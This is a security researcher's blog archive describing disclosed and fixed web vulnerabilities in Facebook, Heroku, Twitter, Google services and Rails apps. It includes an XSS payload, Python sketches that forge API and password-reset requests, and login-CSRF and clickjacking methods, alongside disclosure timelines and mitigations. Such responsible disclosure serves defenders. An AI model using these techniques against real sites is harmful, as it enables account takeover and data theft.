Stephen Sclafani

Posts in 'Webappsec'

Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User

July 8th, 2014


A misconfigured endpoint allowed legacy REST API calls to be made on behalf of any Facebook user using only their user ID, which could be obtained from their profile or through the Graph API. Through REST API calls it was possible to view a user’s private messages, view their private notes and drafts, view their primary email address, update their status, post links to their timeline, post as them to their friends’ or public timelines, comment as them, delete their comments, publish a note as them, edit or delete any of their notes, create a photo album for them, upload a photo for them, tag them in a photo, and like and unlike content for them. All of this could be done without any interaction on the part of the user.

An Interesting Request

When starting a pentest I like to browse the target site with Burp open to get a feel for how the site is structured and to see the requests that the site is making. While browsing Facebook’s mobile site the following request caught my attention:


The request was used to get your bookmarks. It was interesting for three reasons: it was making an API call rather than a request to a dedicated endpoint for bookmarks; it was being made to a nonstandard API endpoint; and the call was neither Graph API nor FQL. A Google search for bookmarks.get turned up nothing. After some guessing I found that the method notes.get could also be called, which returned your notes. Through some more searching I found that the endpoint was using Facebook’s deprecated REST API.

The Facebook REST API

The REST API was the predecessor of Facebook’s current Graph API. All of the documentation for the REST API has been removed from Facebook’s website but I was able to piece together some of it from the Wayback Machine. The REST API consists of methods that can be called by both Web applications (websites) and Desktop applications (JavaScript, mobile, and desktop applications). To make a call an application makes a GET or POST request to the REST API endpoint:



The request consists of the method being called, the application’s API key, a session key for a user, any parameters specific to the method, and a signature. The signature is a MD5 of all of the parameters and either the application’s secret, which is generated along with the API key when the application is registered with Facebook, or a session secret which is returned with a session key for a user. Web applications sign requests with their application secret. Requests signed with the application secret can make calls on behalf of users and to administrative methods. Desktop applications sign requests with a user’s session secret. Requests signed with a session secret are limited to making calls only for that user. This allows Desktop applications to make calls without exposing their application secret (which would have to be embedded in the application). An application obtains a session key for a user through an OAuth like authentication flow.
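As a minimal sketch of the signing scheme described above, assuming the classic REST convention of concatenating the alphabetically sorted key=value pairs and appending the secret before hashing (all parameter values here are hypothetical):

```python
import hashlib

def sign_request(params: dict, secret: str) -> str:
    # Concatenate the parameters as key=value pairs, sorted by name,
    # append the secret, and take the MD5 hex digest.
    base = "".join(f"{k}={v}" for k, v in sorted(params.items()))
    return hashlib.md5((base + secret).encode("utf-8")).hexdigest()

params = {
    "method": "users.getInfo",
    "api_key": "example-api-key",         # hypothetical values
    "session_key": "example-session-key",
    "v": "1.0",
}
params["sig"] = sign_request(params, "example-app-secret")
```

A Desktop application would pass the user’s session secret in place of the application secret when computing the signature.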

Making Calls on Behalf of Any User

From reading the documentation I knew the address of the actual REST API endpoint, which meant that the endpoint I had found had to be acting as a proxy. This raised two questions: as what Facebook application was it proxying requests, and what permissions did that application have?

So far I had only called read methods. I attempted to call the publishing method users.setStatus:


Calling this method updated the status on the account that I was logged in to. The update was displayed as being made via the Facebook Mobile application:


This is an internal application used by the Facebook mobile website. Many internal Facebook applications are authorized and granted full permissions for every user. I was able to confirm that this was the case for the Facebook Mobile application by calling the methods friends.getAppUsers and fql.query. Calling friends.getAppUsers showed that the application was authorized for every friend on the account that I was logged in to. Calling fql.query allowed me to make an FQL query on the permissions table to look up the permissions that the application had been granted.

The fact that I was authenticated with the REST server as the account I was logged in to meant that the proxy had to be generating a session key from my session and passing it with each request. This should have limited me to making calls only for that account; however, I noticed in the documentation that for many methods a session key is optional if the method is being called by a Web application (i.e. the request is signed with the application’s secret). For these methods a uid parameter can be passed in place of a session key, set to the user ID of any user who has authorized the application and granted it the required permission for the method being called.

Through calling users.setStatus I had been able to find out what Facebook application the proxy was using, but more importantly I had been able to confirm that the proxy would pass any parameters to the REST server that I included in a request. The question now was: Was the proxy signing requests with the Facebook Mobile application secret or my session secret? And if the proxy was using the application secret, would the REST server accept the uid parameter? Including the uid parameter in a request would not stop the proxy from also passing a session key and there was the possibility that the REST server would reject the request if both were passed.

To test it I tried updating the status on a different account than the one I was logged in to by calling users.setStatus with the uid parameter set to the user ID of that account. It worked. The status on the account whose user ID I passed was updated. Not only was the proxy signing requests with the application secret but, equally important, when passed both a session key and the uid parameter the REST server would prioritize the uid.
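The test request can be sketched as follows. The proxy path is a placeholder since the real mobile-site endpoint is not reproduced here, and the user ID is hypothetical; the key point is that the attacker supplies only the method, its arguments, and the extra uid parameter, while the proxy adds the api_key, session key, and signature itself:

```python
import urllib.parse

# Parameters for the proxied REST call. The uid parameter names the
# target account and, as described above, takes precedence over the
# session key that the proxy attaches.
params = {
    "method": "users.setStatus",
    "status": "test",
    "uid": "1234567890",  # hypothetical target user ID
}
url = "https://example.invalid/api/rest/?" + urllib.parse.urlencode(params)
```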

The documentation for the REST API states that the use of the uid parameter is limited to only those users who have authorized the application and granted it the required permission for the method being called. Since the Facebook Mobile application had been authorized and granted full permissions for every user, it was possible to use the uid parameter to make calls on behalf of any user using any of the methods that supported it.

The following methods can be called with the uid parameter:

message.getThreadsInFolder Returns all of a user’s messages.
users.setStatus Updates a user’s status. Posts a link to a user’s timeline.
stream.publish Publishes a post to a user’s timeline, friend’s timeline, page, group, or event.
stream.addComment Adds a comment to a post as a user.
stream.removeComment Removes a user’s comment from a post.
notes.create Creates a new note for a user.
notes.edit Edits a user’s note.
notes.delete Deletes a user’s note.

This method is only supposed to delete notes that were created by the user through the application. However, in my tests, when called through the proxy it would delete any note.

photos.createAlbum Creates a new photo album for a user.
photos.upload Uploads a photo for a user.
photos.addTag Tags a user in a photo.
stream.addLike Likes content for a user.
stream.removeLike Unlikes content for a user.

Some methods that required a session key would return additional information when called through the proxy:

users.getInfo Returns information on a user.

This method is only supposed to return the information on the user that is viewable to the calling user. However, when called through the proxy it would return the user’s primary email address regardless of the relationship between the user and the calling user.

notes.get Returns the notes for a user.

This method is only supposed to return the notes for the user that are viewable to the calling user. However, when called through the proxy it would return all of the user’s notes, including their drafts.

In addition to the above user methods, the following administrative methods could be called through the proxy on behalf of the Facebook Mobile application:

admin.getAppProperties Gets the property values set for the application.
admin.setAppProperties Sets the property values for the application.
admin.getRestrictionInfo Returns the demographic restrictions for the application.
admin.setRestrictionInfo Sets the demographic restrictions for the application.
admin.getBannedUsers Returns a list of the users who have been banned from the application.
admin.banUsers Bans users from the application.
admin.unbanUsers Unbans users from the application.
auth.revokeAuthorization Revokes a user’s authorization of the application.
auth.revokeExtendedPermission Revokes an extended permission for a user of the application.
notifications.sendEmail Sends an email to a user as the application.


I reported this issue to Facebook on April 23rd. A temporary fix was in place less than three hours after my report. A bounty of $20,000 was awarded by Facebook as part of their Bug Bounty Program.


April 23,  4:42pm – Initial report sent
April 23,  5:50pm – Request for clarification from Facebook
April 23,  6:08pm – Clarification sent
April 23,  6:49pm – Acknowledgment of issue by Facebook
April 23,  7:38pm – Notification of temporary fix by Facebook
April 23,  8:39pm – Confirmation of temporary fix sent
April 29, 11:03pm – Notification of permanent fix by Facebook
April 30, 12:58am – Confirmation of permanent fix sent
April 30,  8:35pm – Bounty awarded

Part 2 Preview

If you looked at the REST API Authentication guide and thought that there might be vulnerabilities there, you would have been correct. Both the Web and Desktop authentication flows were vulnerable to CSRF issues that led to full account takeover. These issues were less serious than the API endpoint issue as they required a user to load links while logged in to their account. However, the links could be embedded in a web page or anywhere where images can be embedded. I have embedded one as an image in this blog post. Click to display it. If you’re logged in to Facebook I’d have full access to your account (the issue has been fixed). In an actual attack loading the link would not have required a click.

24 Comments | Categories: Webappsec

Obtaining The Primary Email Address Of Any Facebook User

July 9th, 2013

Given only their ID, it was possible to obtain the primary email address of any Facebook user regardless of their privacy settings.

Anyone who has subscribed to a public mailing list knows the problem of members inviting their entire contacts list, including the mailing list, to every new social site and app. This has turned mailing list archives into a Wayback Machine for email notifications. Searching through some old mailing lists I came across a Facebook invitation reminder circa 2010:


Clicking the link in the email displayed a sign up page prefilled with the list’s address and the name of a person who had used the link to sign up for an account:


The link contained two parameters: “re” and “mid”:

Changing the re parameter did nothing; however, changing parts of the mid parameter resulted in other addresses being displayed. Taking a closer look at the parameter, its value was actually a string of values with “G” acting as a delimiter:

59b63a G 5af3107aba69 G 0 G 46

Only the second value was important: it was the ID associated with the address that the invitation was sent to, in hex. A Facebook user’s numerical ID could be put as this value and their primary email address would be displayed. A user’s numerical ID is considered public information and can be obtained from the source of their profile or through the Graph API.
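Putting the pieces together, forging a mid value for a target user amounts to hex-encoding their numerical ID and splicing it into the second G-delimited field (the surrounding field values are taken from the example above):

```python
def forge_mid(user_id: int, prefix: str = "59b63a") -> str:
    # Fields are joined with "G"; the second field is the recipient ID
    # in hex, here replaced with the target user's numerical ID.
    return "G".join([prefix, format(user_id, "x"), "0", "46"])

forged = forge_mid(4)  # user ID 4 → "59b63aG4G0G46"
```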


This issue was reported to Facebook on March 22nd and was fixed within 24 hours. A bounty of $3,500 was awarded as part of their Bug Bounty program.


Vulnerabilities in Heroku

January 9th, 2013

Recently, while contemplating hosting options for my startup, I decided to take a look at Heroku. Upon signing up, I noticed that Heroku used a two-step sign up process. Multi-step sign up processes are notorious for containing security vulnerabilities, and after taking a closer look at Heroku’s I found that it was possible, given only their user ID, to obtain any user’s email address and to change their password.

Sign Up Vulnerability

In the first step of Heroku’s sign up process a user enters their email address:


Upon submitting the form, the user is sent a confirmation email containing a link to activate their account. The activation link consists of the user’s ID and a token:

Upon loading the activation link, the user is prompted to set a password for their account. The email address that the user entered in the first step is displayed:


When the form is submitted a POST is made containing the user’s ID and the token from the activation link:



If the POST was made with the token parameter removed and the password fields left blank, the resulting error page would display the email address of any user whose ID was put as the value of the “id” parameter:



If the POST was made with the token parameter removed and the password fields filled in, the user’s password would be changed:
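The forged request can be sketched as below. The endpoint path and field names are hypothetical stand-ins for the real form fields; the key point is that the token parameter is omitted entirely while the victim’s ID is supplied:

```python
import urllib.parse

# Hypothetical form fields: the victim's ID is supplied, the activation
# token is left out, and the password fields are filled in to take over
# the account (leaving them blank instead disclosed the email address).
body = urllib.parse.urlencode({
    "id": "12345",
    "user[password]": "attacker-chosen",
    "user[password_confirmation]": "attacker-chosen",
}).encode()
# The body would then be POSTed to the activation endpoint, e.g.:
# urllib.request.urlopen("https://example.invalid/signup/finish", body)
```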



Reset Password Vulnerability

A second vulnerability was found in Heroku’s reset password functionality. By modifying the POST request it was possible to reset the password of a random (nondeterministic) user each time that the vulnerability was used.

If a user has forgotten their Heroku password they can use the Reset Password form to reset it:


Upon submitting the form, the user is sent an email containing a link with which they can reset their password. The link consists of an ID:

Upon loading the link, the user is prompted to set a new password for their account:


When the form is submitted a POST is made containing the ID in both the URL and body of the request:



If the POST was made with ID removed from both the URL and body, the password of a random account would be reset and the account automatically logged in to:




I reported these issues to Heroku on December 19. Initial fixes were in place within 24 hours. Heroku asked me to hold off on publishing a public disclosure so that they could do a review of their code which I agreed to.

Update: Heroku’s official response.

Despite finding these vulnerabilities I plan to host my startup at Heroku. Security vulnerabilities happen and Heroku handled the reports well.

Note: All of Heroku’s forms are protected against CSRF with an “authenticity_token” parameter. I removed the parameter from the above examples for clarity.


CSRF Vulnerability in OAuth 2.0 Client Implementations

April 6th, 2011

OAuth 2.0 is the next generation of the OAuth protocol. OAuth 2.0 has been designed to make implementation simpler for both service providers and clients. Unfortunately, this simplification has left the majority of client website implementations vulnerable to cross-site request forgery.


Facebook is currently the largest service provider using OAuth 2.0. Facebook offers OAuth 2.0 as an authentication option for its API. When a client website that has implemented the Facebook API authenticates a user using OAuth 2.0 the website redirects the user to an authorization URL on Facebook:

The user is prompted by Facebook to login and authorize the website. If authorization is granted the user is redirected to the callback URL in the redirect_uri parameter along with a code:

The website can then exchange the code for an OAuth access token and use the token to make API requests on behalf of the user.

Unlike with OAuth 1.x, where a request token is passed through the entire flow, there is nothing that ties the request to authorize with the returned code. An attacker can generate a code for their own Facebook account for a target website and can then get a victim to load the code in the website’s callback URL. If the victim is logged in, the website will automatically use the code to link the victim’s account to the attacker’s Facebook account. If the website has implemented Facebook as a secondary login option the attacker can then log in to the victim’s account using Facebook.

I tested this attack against The New York Times, Photobucket, TripAdvisor, StackOverflow, Digg and Formspring all of which were vulnerable.


The OAuth 2.0 spec defines an optional “state” parameter which clients can use to maintain state between the authorization request and the callback. Clients can use this parameter to protect themselves against this attack by passing a unique-to-user nonce as the value of the parameter when redirecting a user:

The nonce is included with the code in the callback if authorization is granted:

A client can then check if the nonce is valid and that it belongs to the logged in user before taking action.


Facebook was notified of this issue in January. Since being notified they have taken the following actions:

  • Notified major developers of the issue.
  • Added a section detailing the issue and the use of the “state” parameter for mitigation to their authentication documentation.
  • Began updating their SDKs to use the “state” parameter.

Beyond Facebook

While Facebook is the largest service provider using OAuth 2.0 this is not a Facebook specific issue. Any website that implements a third party service that uses OAuth 2.0 for authentication can be vulnerable to this attack. In addition to Facebook, members of the OAuth community were notified of this issue and discussion to add details of the issue to the OAuth 2.0 spec is ongoing.


A Parsing Quirk and a #NewTwitter XSS

October 4th, 2010

I generally don’t blog about individual XSS issues; however, this particular one was made more interesting by the fact that it took advantage of a browser parsing quirk that I’ve increasingly seen become an issue as web applications become more “application”-like with the help of javascript.

In 2009 the Mikeyy worm was able to inject javascript into user profiles by exploiting the lack of a validity check in the custom colors functionality and the lack of sanitization when displaying the custom colors on the profile. In response, Twitter added sanitization and has since implemented a check on the validity of custom colors. An attempt to submit invalidly formatted colors results in an error being returned. In addition to setting custom colors, a user can upload a custom background image. When the image is uploaded the user’s current colors are also sent. Twitter failed to extend their validity check to this functionality, allowing the colors to be set to any arbitrary value. On both the old and new Twitter custom colors are sanitized when displayed on the profile; however, the profile is not the only place on the new Twitter where a user’s colors are used.

On the loading of the new Twitter a call to the javascript function twttr.API._requestCache.inject is made to display the user’s timeline. Passed to this function is the metadata of the most recent tweets made by the users that the user is following. The metadata of a tweet includes much data that is not displayed, including the profile colors of the user who made it. The colors were included unsanitized.

twttr.API._requestCache.inject("statuses/home_timeline",[{'contributor_details': true, 'include_entities': 1}],[{"retweeted":false,"truncated":false,"geo":null,"entities":{"hashtags":[],"user_mentions":[],"urls":[]},"place":null,"retweet_count":null,"source":"web","favorited":false,"contributors":null,"user":{"contributors_enabled":false,"profile_sidebar_fill_color":"DDEEF6","description":null,"geo_enabled":false,"time_zone":null,"following":true,"notifications":false,"profile_sidebar_border_color":"C0DEED","verified":false,"profile_image_url":"","follow_request_sent":false,"profile_use_background_image":true,"profile_background_color":"\"</script><script>alert('XSS')</script>","screen_name":"stephensclafani","profile_background_image_url":"","followers_count":0,"profile_text_color":"333333","protected":false,"show_all_inline_media":false,"profile_background_tile":false,"friends_count":0,"url":null,"name":"Stephen Sclafani","listed_count":0,"statuses_count":1,"profile_link_color":"0084B4","id":1598801,"lang":"en","utc_offset":null,"favourites_count":0,"created_at":"Tue Mar 20 07:11:24 +0000 2007","location":null},"id":25168131043,"coordinates":null,"in_reply_to_screen_name":null,"in_reply_to_user_id":null,"in_reply_to_status_id":null,"text":"xss","created_at":"Tue Sep 2120:38:26 +0000 2010"}], 1);

One might expect the injected javascript not to be executed, as it’s within a quoted javascript string and the injected double quote is escaped with a backslash. However, due to a quirk in browser parsing, this is not the case. When a browser parses a document and finds a <script> tag it looks for the following </script> tag and ends the block of javascript even if that </script> tag is within a quoted string. By including a </script> tag before the injected block of javascript, the block of javascript being injected into is ended prematurely. This breaks the quoted string, allowing the injected block of javascript to be executed.
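The quirk can be observed with Python’s own HTML tokenizer, which, like browsers, treats everything up to the first </script> as the script body even when that tag appears inside a string literal:

```python
from html.parser import HTMLParser

class ScriptSniffer(HTMLParser):
    # Collects the raw text chunks the parser sees between tags.
    def __init__(self):
        super().__init__()
        self.chunks = []

    def handle_data(self, data):
        self.chunks.append(data)

doc = '<script>var s = "</script><script>alert(1)</script>";</script>'
sniffer = ScriptSniffer()
sniffer.feed(doc)
# The first script block ends at the first </script>, stranding the rest
# of the "string" and letting the injected script stand on its own.
```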

#NewTwitter XSS

By combining these two issues it was possible for a user to inject javascript into the timelines of all of their followers. Twitter was notified of the two issues and has since deployed fixes for both.

For a second example of the quirk see Mike Bailey’s post on an XSS.


Ruby on Rails: Secure Mass Assignment

January 4th, 2010

The security implications of mass assignment have been documented since Rails’s inception and yet many applications are still vulnerable. In a survey of the top Rails websites I found that the majority were vulnerable to the issue. At three I was able to gain full admin privileges, at others I was able to gain access to other users’ data, in one case to partial credit card information.

Mass Assignment

@user =[:user])

In the above line of code mass assignment is used to populate a newly created User from the params hash (user submitted data). If no precautions are taken an attacker can pass in their own parameters and set any User attributes.

t.column :admin, :boolean, :default => false, :null => false

Consider an application that has a users table containing an admin column. When creating a new account an attacker can pass in the parameter user[admin] set to 1 and make themselves an admin.

has_many :blog_posts

It’s not only database columns that can be attacked in this fashion. Consider an application that has the above line of code in its User model. Because has_many allows the setting of ids via mass assignment, an attacker can pass in the parameter user[blog_post_ids][] and take control of other users’ blog posts.


Rails provides the class method attr_accessible, which takes a whitelist approach to protection. Using attr_accessible you specify the attributes that can be set through mass assignment and all others will be protected.

Testing for Vulnerability

From a black box perspective it’s easy to determine if an application is vulnerable by attempting to set an attribute that you know could not exist. In the majority of cases a 500 error will be returned. In a few cases an error page with a message such as “Unable to create account” or “Unable to save settings” was returned.
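As a sketch, the probe is just a normal form submission with one extra, impossible parameter added (the URL and field names below are hypothetical):

```python
import urllib.parse

# A signup POST body with an attribute that cannot exist on the model.
# If the application passes the params hash straight into mass
# assignment, the unknown attribute triggers an error and the site
# typically responds with a 500.
body = urllib.parse.urlencode({
    "user[email]": "",
    "user[zz_no_such_attribute]": "1",
}).encode()
# The body would then be POSTed to the signup endpoint, e.g.:
# urllib.request.urlopen("https://example.invalid/users", body)
```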


Exploiting Unexploitable XSS

May 26th, 2009

XSS that are protected by CSRF protection or where other mitigating factors are present are usually considered to be unexploitable or of limited exploitability. This post details real world examples of exploiting “unexploitable” XSS in Google and Twitter. While the XSS detailed in this post are site specific the methods that were used to exploit them could be applied to other websites with similar implementations. Alex’s (kuza55) Exploiting CSRF Protected XSS served as inspiration for this post.


Google has services deployed across many different domains and subdomains and as a result requires a way to seamlessly authenticate members who are logged in to their Google Account. Google’s solution to this problem is the ServiceLogin URL.

When called by a member who is logged in to their Google Account the URL generates an auth URL and redirects to the particular service.

When the auth URL is loaded the service uses the auth token to log the member in. No verification was done between the service and Google to ensure that the account that the member was being logged in to was actually theirs. It was possible, then, for an attacker to generate an auth URL for their own account at a service and to use it to log a member in without affecting the member’s Google Account session. Because the member’s Google Account session was untouched, it was also possible for the attacker to use the ServiceLogin URL to log the member back into their own account at the service.

Google Sites XSS

On the Google Sites User Settings page a user’s settings were used in a javascript function unsanitized. As a result, it was possible for an attacker to submit a setting with a value that would break out of the function and inject javascript into the page. Since the User Settings form is protected against CSRF, this was a self-only XSS. However, with the ability to log a member into an account and back into their own account the attacker could exploit this issue as if it was a full blown reflected XSS.

Blogger XSS

On the Advanced Settings page for publishing a Blogger blog on a custom domain a javascript function takes the value of the “Your Domain” field and displays it in the “Use a missing files host?” section. This function would display the value unsanitized. If the Advanced Settings form is submitted with javascript as the domain an invalid domain error is returned. On the error page the function is executed on page load which would result in the javascript being reflected on the page. Blogger’s forms are protected against CSRF, however like with the bad domain error message, the error message for using a bad CSRF token is displayed along with the XSS on the error page. This XSS was limited, however, in that to make a successful POST a blog ID belonging to the current logged in member is required. An attacker would have to hard code their exploit for a specific target blog otherwise the POST would be redirected to a login page. The attacker could get around this limitation, however, by logging a member into an account that they had created with a known blog ID which could then be used in the POST to trigger the XSS.

The XSS in Blogger was made easier to exploit due to the error message for using a bad CSRF token being displayed on the same page as the XSS. When the error message is properly displayed on a separate page, reflected XSS that require a POST and are protected by CSRF protection are considered to be unexploitable, since it should be impossible for an attacker to know the CSRF token. However, this is not always the case. Many sites’ CSRF protection implementations, including those of the majority of Google services, tie the CSRF token to a member’s account but not to a specific session of that account, making the token compatible across sessions of the same account. With the ability to log a member into an account and to predict the CSRF token for the account, it becomes possible for an attacker to exploit these XSS as if they were unprotected.

YouTube XSS

A YouTube member can create paid promotions for their videos. A promotion consists of a frame from the video and three lines of text. On the second step of the promotion creation process, the “Write your Promotion” page, a member is given three frames from their video to choose from and three text fields to enter their three lines of text. When the form is submitted, if the text fields contain invalid characters such as html/javascript an error is returned. On the error page the value of the first text field was used unsanitized in the title and alt attributes of the promotion’s image. YouTube’s forms are protected against CSRF and the error message for using a bad CSRF token is displayed on its own page. However, because YouTube’s CSRF tokens are compatible across sessions of the same account, it was possible for an attacker to exploit this XSS by logging a member into an account that they control.

Since being notified of these XSS Google has fixed the issues. Google has also started deploying protection to prevent the exploitation of auth URLs. The protection has already been deployed at Gmail and Google is looking to extend it to other services.


Twitter XSS

On every Twitter page a member’s language preference is used as a variable in the Google Analytics code. For members who had not yet set a language preference it was possible for an attacker to set it temporarily by using the URL:

The value would be used in the Google Analytics code unsanitized.

Since setting any of the profile settings also sets a language preference, and since setting their profile settings is the first thing most Twitter members do after registering, very few members would have been vulnerable to this XSS.

Twitter, like many sites that have implemented CSRF protection, did not extend the protection to its login page, allowing login CSRF attacks. With a login CSRF attack it would have been possible for an attacker to exploit the XSS by first logging a member into an account that had not yet had its language preference set. However, since using login CSRF destroys a member’s session, this attack would have had limited exploitability.

Twitter has a “Remember me” feature on its login page that when used will remember a member’s session after they have shut down their browser. Different sites implement this feature in different ways. Some sites set the same session cookies but make them persistent if the feature is used, other sites such as Twitter set a unique persistent cookie in addition to the session cookie. If an attacker used a login CSRF attack against a member who had logged in to Twitter using the “Remember me” feature, and in the attack the feature was unused, the member’s session would be overwritten but their “Remember me” cookie would not be. The attacker could then exploit the XSS and either steal the cookie or use it to log the member back into their own account and continue with the attack.

Since being notified of the XSS Twitter has fixed the issue and has extended its CSRF protection to its login page.


Clickjacking & OAuth

May 4th, 2009

This post details clickjacking and how it poses a serious security threat to OAuth service providers.


Clickjacking is when a visitor to a web page is tricked into clicking on an element that they believe to be harmless when in reality they are clicking on an element on a different website that exposes protected data or grants an attacker access. There are a number of ways to implement a clickjacking attack, but the most common way is to load the target website in a transparent iframe. The iframe is then positioned so that the target element that the attacker wishes a visitor to click on is positioned over a dummy element on the page that the iframe is contained on. Because the iframe is given a higher stack order than the dummy element, when a visitor clicks on the dummy element they are actually clicking on the hidden transparent element.

You can read more on clickjacking from Robert Hansen and Jeremiah Grossman here.


In 3-legged OAuth, as the result of an action taken by a User, a Consumer requests a Request Token from the Service Provider and then passes that Request Token to the Service Provider’s Authorization URL through redirection. The Service Provider then displays a page prompting the User to approve or deny the Consumer access.


In this example Faji is the Service Provider and Beppa is the Consumer. If Beppa’s developers were malicious they could use a clickjacking attack against Faji’s approval page to trick users into granting their application access.



From the user’s perspective the link appears to be harmless, but in reality clicking it will grant Beppa access.

This is a basic example, however with a little social engineering it becomes trivial to get a user to click on the dummy element and have the attack go undetected.


There are two solutions to protect against clickjacking each with its own issues.

Service providers can use frame busting scripts to prevent their approval page from being framed. However, due to Internet Explorer’s support of a security=”restricted” attribute on frames, frame busting scripts can be disabled in IE. For IE8, Microsoft has announced support for an X-Frame-Options HTTP response header which service providers can use to deny their approval page from rendering in a frame. However, IE8 is not yet widely used. One workaround is to require that Internet Explorer users have javascript enabled, but this comes with its own set of issues.
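The header-based defense can be sketched as a minimal WSGI app (the response body is a placeholder):

```python
def approval_page(environ, start_response):
    # X-Frame-Options: DENY tells supporting browsers never to render
    # this page inside a frame, defeating the transparent-iframe overlay
    # described above.
    headers = [
        ("Content-Type", "text/html"),
        ("X-Frame-Options", "DENY"),
    ]
    start_response("200 OK", headers)
    return [b"<h1>Allow this application access?</h1>"]
```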

Service providers can require that users authenticate themselves before being shown the approval page, even if they are already signed in to the service. By doing so it becomes impossible for their approval page to be framed, since a user’s credentials are not known to Consumers. This can be an inconvenience for some users, but more importantly, by conditioning users to enter their credentials each time they are redirected from a Consumer it can increase the potential for phishing attacks. Service providers that choose this solution should educate their users about phishing attacks and should provide mechanisms that make it easier for users to confirm the authenticity of their site.


At the time of this post all service providers had been notified.
